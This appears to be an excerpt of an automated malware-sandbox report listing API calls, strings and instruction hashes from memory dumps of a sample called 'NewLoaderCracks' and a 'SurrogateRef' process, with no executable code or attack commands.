                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                • String ID: *?$.
                • API String ID: 2667617558-3972193922
                • Opcode ID: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction ID: c7e0ca1179544e5ff92ad85a040b778562ab80d390c26a90eaa0d7ce26199c9d
                • Opcode Fuzzy Hash: 46d45437bf881060891f947650aec9d3ba4d76883fc361421d2bb44ca5e48db8
                • Instruction Fuzzy Hash: DF518F71E0020AAFDF14DFA8C981AADBBB5FF98310F25816AE554E7341EA319E01CF51
                APIs
                • __EH_prolog.LIBCMT ref: 00547730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 005478CC
                  • Part of subcall function 0054A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0054A27A,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A458
                  • Part of subcall function 0054A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0054A27A,?,?,?,0054A113,?,00000001,00000000,?,?), ref: 0054A489
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: abab0c1df838b26785e4009ed5e7fb2b5efc900a83dbe27da81885f46e9ffbf9
                • Instruction ID: 737bfb1c3480ca1bff2f05108ff7ff09b010c172f08616347dd504f9f6fabc3a
                • Opcode Fuzzy Hash: abab0c1df838b26785e4009ed5e7fb2b5efc900a83dbe27da81885f46e9ffbf9
                • Instruction Fuzzy Hash: 1A415371804159AADB24EB54DD5AEEE7B7CFF85308F00409AB509A2092DB745F88DF61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: bf4aa1fe75bfb441e662ac83ae13453d6f818689d03259c01a3739a7c5a1dd0e
                • Instruction ID: c6c4af9c5d503019dce717180286b284daf703626642bfbf21aa65a3be751da2
                • Opcode Fuzzy Hash: bf4aa1fe75bfb441e662ac83ae13453d6f818689d03259c01a3739a7c5a1dd0e
                • Instruction Fuzzy Hash: 6F41C23584021ABAEF20AF25DC45EEF7FADFF81398B104425F958A3252E770DA51DB60
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 005543D8
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Exception@8Throw
                • String ID: HCW$XCW
                • API String ID: 2005118841-2329088137
                • Opcode ID: a4b7bfea6c4fa9b61be5d291dc1f0d0d1952ecb835ca5cb09fbca330007fe329
                • Instruction ID: cb76c3627eb0f7180c6c635eef606bfe3ace459f4e6fca4de02b8ca0151addd7
                • Opcode Fuzzy Hash: a4b7bfea6c4fa9b61be5d291dc1f0d0d1952ecb835ca5cb09fbca330007fe329
                • Instruction Fuzzy Hash: E1416F746007018FD314DF28D495BAABBE5FF98305F05492EE89EC7361EB72E8488B41
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: 6d29ababc02fbfe07f89a8b3a2cc505c7238c432f4a4835eb1c87b649a9a7d70
                • Instruction ID: 0e902082725d7b2cc85156d3b8b75060032d4bb5ac92af1f25f91618d82476e1
                • Opcode Fuzzy Hash: 6d29ababc02fbfe07f89a8b3a2cc505c7238c432f4a4835eb1c87b649a9a7d70
                • Instruction Fuzzy Hash: 09218571614305DFCB089F64D8A992A7BA9FF84712B14856EFC099B292DB74EC04DB60
                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,00010408,0055A990,?,?), ref: 0055D4C5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$xjY
                • API String ID: 665744214-1267677434
                • Opcode ID: 0955cff9f229cf6e48717e2a7af2dc40c01ddf6abd16bd08cb8d666d4c5d7123
                • Instruction ID: baeb623ad3f31255b066960a1dad4fcae492523ab43571795361c30aa78f80f3
                • Opcode Fuzzy Hash: 0955cff9f229cf6e48717e2a7af2dc40c01ddf6abd16bd08cb8d666d4c5d7123
                • Instruction Fuzzy Hash: 71112672600248ABDF31DE34AC46BAA3FE8B706316F048065BD49B7191D6F0AC4CA770
                APIs
                  • Part of subcall function 0054EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0054EB92
                  • Part of subcall function 0054EB73: GetProcAddress.KERNEL32(005881C0,CryptUnprotectMemory), ref: 0054EBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,0054EBEC), ref: 0054EC84
                Strings
                • CryptProtectMemory failed, xrefs: 0054EC3B
                • CryptUnprotectMemory failed, xrefs: 0054EC7C
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: 6648bbf92abf4b381e3d998d7600f24e80cac39577cdc9a0ecbc04495c0fc17d
                • Instruction ID: 440a488b1c00d1f43e29081f31255bf3fe5609aed38a9a7700fcfaf3fa7ec395
                • Opcode Fuzzy Hash: 6648bbf92abf4b381e3d998d7600f24e80cac39577cdc9a0ecbc04495c0fc17d
                • Instruction Fuzzy Hash: D3113332A00224ABDB149F34EC8BBEE3F54FF40728B048019FC056B282CB35AE45A7D1
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: _free
                • String ID: XW
                • API String ID: 269201875-708546550
                • Opcode ID: 705da87ad09896e11661aec480bc0d0e3ccf97066c1c0c36b5a4e963b4a866e9
                • Instruction ID: 6a0973da1660bf0d1b51813d564152ee315cf105041f861bebe16bba98a8297f
                • Opcode Fuzzy Hash: 705da87ad09896e11661aec480bc0d0e3ccf97066c1c0c36b5a4e963b4a866e9
                • Instruction Fuzzy Hash: CD11B679A006125AEB209B39BC45B663FD9BBA6730F140725F521CB2E0EF70C8466B85
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0055F25E
                • ___raise_securityfailure.LIBCMT ref: 0055F345
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8Z
                • API String ID: 3761405300-3945376669
                • Opcode ID: 9deb89581ed5ea0ffa1c4fd3c9b1ae5e60cb9f263ecabc195ceb66762d0403fa
                • Instruction ID: 2739b67ca829fa6e32609344507686729e6040c287b510654fccead55fc7ee22
                • Opcode Fuzzy Hash: 9deb89581ed5ea0ffa1c4fd3c9b1ae5e60cb9f263ecabc195ceb66762d0403fa
                • Instruction Fuzzy Hash: 602128B9520304CBD750DF54F9966003BE8BB6A310F10682AEA098B3E0E3B25988FF45
                APIs
                • CreateThread.KERNEL32(00000000,00010000,005509D0,?,00000000,00000000), ref: 005508AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 005508F4
                  • Part of subcall function 00546E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00546EAF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                • Opcode ID: 8945fa75c155a9a44ef08ea226be428c24ae52746f11015d2af00ef56a0c6597
                • Instruction ID: a091f20fced0f324dc4f8e06cf684a5854306588fc0e9ad2c13050f2ab7d389c
                • Opcode Fuzzy Hash: 8945fa75c155a9a44ef08ea226be428c24ae52746f11015d2af00ef56a0c6597
                • Instruction Fuzzy Hash: 30012BB12403026FD7206F10EC95FA67BD8FF40712F10002EFE46620C1CEA16848A760
                APIs
                  • Part of subcall function 00568FA5: GetLastError.KERNEL32(?,00580EE8,00563E14,00580EE8,?,?,00563713,00000050,?,00580EE8,00000200), ref: 00568FA9
                  • Part of subcall function 00568FA5: _free.LIBCMT ref: 00568FDC
                  • Part of subcall function 00568FA5: SetLastError.KERNEL32(00000000,?,00580EE8,00000200), ref: 0056901D
                  • Part of subcall function 00568FA5: _abort.LIBCMT ref: 00569023
                • _abort.LIBCMT ref: 0056B2E0
                • _free.LIBCMT ref: 0056B314
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID: W
                • API String ID: 289325740-3818464504
                • Opcode ID: 2cadf3b9d3270031e9f5cee43983f2e5d7d445c8241ad51b091f1eeb208fd9af
                • Instruction ID: d00878bd6a3b7ff6cfa414fd1669b80db08ab522a6a080a236d7cc4af2d6ec6e
                • Opcode Fuzzy Hash: 2cadf3b9d3270031e9f5cee43983f2e5d7d445c8241ad51b091f1eeb208fd9af
                • Instruction Fuzzy Hash: E5018831E01722DBD7319F59580625DBF60BF58721F19464AE924A7741CB306DC1DFC1
                APIs
                  • Part of subcall function 0054DA98: _swprintf.LIBCMT ref: 0054DABE
                  • Part of subcall function 0054DA98: _strlen.LIBCMT ref: 0054DADF
                  • Part of subcall function 0054DA98: SetDlgItemTextW.USER32(?,0057E154,?), ref: 0054DB3F
                  • Part of subcall function 0054DA98: GetWindowRect.USER32(?,?), ref: 0054DB79
                  • Part of subcall function 0054DA98: GetClientRect.USER32(?,?), ref: 0054DB85
                • GetDlgItem.USER32(00000000,00003021), ref: 0054134F
                • SetWindowTextW.USER32(00000000,005735B4), ref: 00541365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                • Opcode ID: 95bafd26dd8d7b7408e9f60b477b07ac3ed0cc72da727d322e7d45db682d353c
                • Instruction ID: b40e0326f496bdf3251e8b5cebfa41d142a6edd3606709e0cf1e34aae88d29fa
                • Opcode Fuzzy Hash: 95bafd26dd8d7b7408e9f60b477b07ac3ed0cc72da727d322e7d45db682d353c
                • Instruction Fuzzy Hash: 17F0873410064CAADF251F61880EBEA3FA8BF21309F08C818BD99559A1C778C9D9EB24
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,00550A78,?), ref: 00550854
                • GetLastError.KERNEL32(?), ref: 00550860
                  • Part of subcall function 00546E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00546EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00550869
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                • Opcode ID: 5a415938915474225c2b482f9c377d8c2e40983ad9ef96dd20400e96a1b69df7
                • Instruction ID: 3239314e0439b4de7496beef338da9aa00861874cf5dda3e6bbe16787646ce40
                • Opcode Fuzzy Hash: 5a415938915474225c2b482f9c377d8c2e40983ad9ef96dd20400e96a1b69df7
                • Instruction Fuzzy Hash: ABD0C73190802162CA003324AC0EEAB7D09BFA2330F204714F63C661E1EA2109A8A292
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,0054D32F,?), ref: 0054DA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,0054D32F,?), ref: 0054DA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                • Opcode ID: 81b177ff1463233747bbc965d771dfc3f5a5b6c55772a410f4ab6cd15059e47c
                • Instruction ID: 27906517aa0e2bb1903b0714832c3f42ef668a0eb761b96d0137c18a3adb20ff
                • Opcode Fuzzy Hash: 81b177ff1463233747bbc965d771dfc3f5a5b6c55772a410f4ab6cd15059e47c
                • Instruction Fuzzy Hash: ECC0123128535076D73017217C0DBC36D587B20F21F05044DB249DA1D0D5E5C984B660
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fb39127913fcdf9462dad11f1df40bff9e6e545c760683e8b7fa6c822ed66a89
                • Instruction ID: 3e13639c7e6415f4daa90065e3a7cb5c6b550307f85b2b1fa2b54cc00e882530
                • Opcode Fuzzy Hash: fb39127913fcdf9462dad11f1df40bff9e6e545c760683e8b7fa6c822ed66a89
                • Instruction Fuzzy Hash: B5B1A171B18A598FEB94DB98C8657ED7BE1FF9A310F40017AD00ED32D6DB7868418740
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8b520465d14a81ff41050a96afcc87ca4870a677b732c99dc0e3d2739c1bd453
                • Instruction ID: f1a1674ca5ce452a8fb26e83621f862240784eee4c94c5820b64335e368204b6
                • Opcode Fuzzy Hash: 8b520465d14a81ff41050a96afcc87ca4870a677b732c99dc0e3d2739c1bd453
                • Instruction Fuzzy Hash: 8B819272B1CA598FEB94DB9CD8657EC7BE1FB96324F50017AD00ED32D6DBA828418740
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID: 2Eo4
                • API String ID: 0-3471188928
                • Opcode ID: 679e57574b74409b1c888977b0b2732227117d07f746d586709ea1edd1423782
                • Instruction ID: 84d166a0e15d40b87ffe69e54e46ce1edaf2ccb3acad05a17dde14c018db5a98
                • Opcode Fuzzy Hash: 679e57574b74409b1c888977b0b2732227117d07f746d586709ea1edd1423782
                • Instruction Fuzzy Hash: 3B818031B0CA594FDB59DE1C88A55E977E2FFD9314B14416EE59ED3282CE38EC028781
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID: 0vU4
                • API String ID: 0-1735094011
                • Opcode ID: 30a79d8181a5843af5e27f2f173a69f8cadcd23d15d209df0b71174888333aa3
                • Instruction ID: 2b3663c61e62d0248cc0879caf1e7312333504bc884132c0712583086cf14588
                • Opcode Fuzzy Hash: 30a79d8181a5843af5e27f2f173a69f8cadcd23d15d209df0b71174888333aa3
                • Instruction Fuzzy Hash: 39118B30A18A1A5EEB41EF6888A92E977E1FF5A350F4045B6D409C61A2EE3CA9449700
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID: hyU4
                • API String ID: 0-1653477003
                • Opcode ID: 1fbcd0214f7819997c2492aee0e80ddc333b764ba262c583366a509d9c6d54a5
                • Instruction ID: 09f04cc204c5a91e7eb5fa133a5a4117ade28a9f5b8fd84b0b04c98b606e2ef5
                • Opcode Fuzzy Hash: 1fbcd0214f7819997c2492aee0e80ddc333b764ba262c583366a509d9c6d54a5
                • Instruction Fuzzy Hash: 5B11BF70A0D9594EEB59EF6484A96F97BE0FF5A311F0004BED14EC60D6EE3D6584D700
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID: hyU4
                • API String ID: 0-1653477003
                • Opcode ID: 42988606ad28061cef0b338fd93080b771319fe75af8edaf4d34a3a1ed51c7d4
                • Instruction ID: 6c0af4ab96b7a28f2e7d3ac1ea2678b963d4d392db0e2f3cc900378b00390bbe
                • Opcode Fuzzy Hash: 42988606ad28061cef0b338fd93080b771319fe75af8edaf4d34a3a1ed51c7d4
                • Instruction Fuzzy Hash: A5F0FF70E1996E4AEB589F6888A83F973E8FB86221F00047AE54EC20C5EE3C1494E640
                Memory Dump Source
                • Source File: 00000005.00000002.2484793520.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffd34660000_SurrogateRef.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aaba134311d43c816dac5e0cd81f2a920fc719fa0b186ce2ef0af8b1847c657d
                • Instruction ID: cbec2c4930a854a667d221290e4ff9e446a7c7cfef120da9880294b124ebcf9a
                • Opcode Fuzzy Hash: aaba134311d43c816dac5e0cd81f2a920fc719fa0b186ce2ef0af8b1847c657d
                • Instruction Fuzzy Hash: 0951D331B08A998FDB58DE1888B55F977E2FFD9314B14457ED59AC3282CE38EC028781
                Memory Dump Source
